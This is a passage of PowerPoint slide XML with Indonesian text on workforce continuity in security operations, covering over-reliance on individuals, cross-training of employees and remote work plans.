              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemanfaatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>silang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suksesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>resistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keterlibatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghambat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberhasilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Silang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keterampilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>silang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>individu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas-tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelatihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>silang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesinambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tenaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Jarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Strategi garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saluran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekspektasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengaturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertransisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lancar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
